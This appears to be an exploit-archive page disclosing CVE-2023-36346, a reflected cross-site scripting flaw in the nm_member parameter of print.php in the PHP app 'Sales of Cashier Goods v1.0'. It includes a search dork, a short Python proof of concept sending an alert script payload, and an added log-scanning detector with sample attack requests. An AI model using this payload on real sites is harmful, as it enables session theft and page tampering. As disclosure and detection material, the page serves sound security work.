Sales of Cashier Goods v1.0 Cross Site Scripting (XSS) Vulnerability / Exploit


Exploits / Vulnerability Discovered : 2023-07-03 | Type : webapps | Platform : php
This exploit / vulnerability, Sales of Cashier Goods v1.0 Cross Site Scripting (XSS), is for educational purposes only; if you use it, you do so at your own risk!


[+] Code ...

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Build the request parameters. requests percent-encodes query values itself,
# so the payload is passed raw (encoding it first would double-encode it).
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params, timeout=10)
print(response.text)
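
For defenders, a log check for the request pattern above, added here as an example and not part of the original advisory or the vendor's code. It scans web access logs for `print.php` requests whose `nm_member` value contains markup after percent-decoding, including values that were encoded more than once. The log lines, the function names and the markup pattern are constructed for illustration and should be tuned to the real log format.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jul/2023:10:00:01 +0000] "GET /print.php?nm_member=Budi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Jul/2023:10:00:07 +0000] "GET /print.php?nm_member=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1" 200 540 "-" "python-requests/2.31.0"
203.0.113.9 - - [03/Jul/2023:10:00:09 +0000] "GET /print.php?nm_member=%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E HTTP/1.1" 200 560 "-" "python-requests/2.31.0"
198.51.100.2 - - [03/Jul/2023:10:01:00 +0000] "GET /index.php?page=barang HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')
# Tag-like markup or an inline event handler; a member name should contain neither.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious(log_text, path="/print.php", param="nm_member"):
    """Return (client_ip, decoded_value) for each request carrying markup in `param`."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if not target.path.endswith(path):
            continue
        # parse_qsl decodes once; fully_decode removes any further layers.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            decoded = fully_decode(value)
            if name == param and MARKUP_RE.search(decoded):
                hits.append((match.group("ip"), decoded))
    return hits


if __name__ == "__main__":
    for ip, value in find_suspicious(SAMPLE_LOG):
        print(f"{ip}\t{value}")
```

A hit shows only that the request was received; whether the value was reflected unescaped depends on how `print.php` encodes its output.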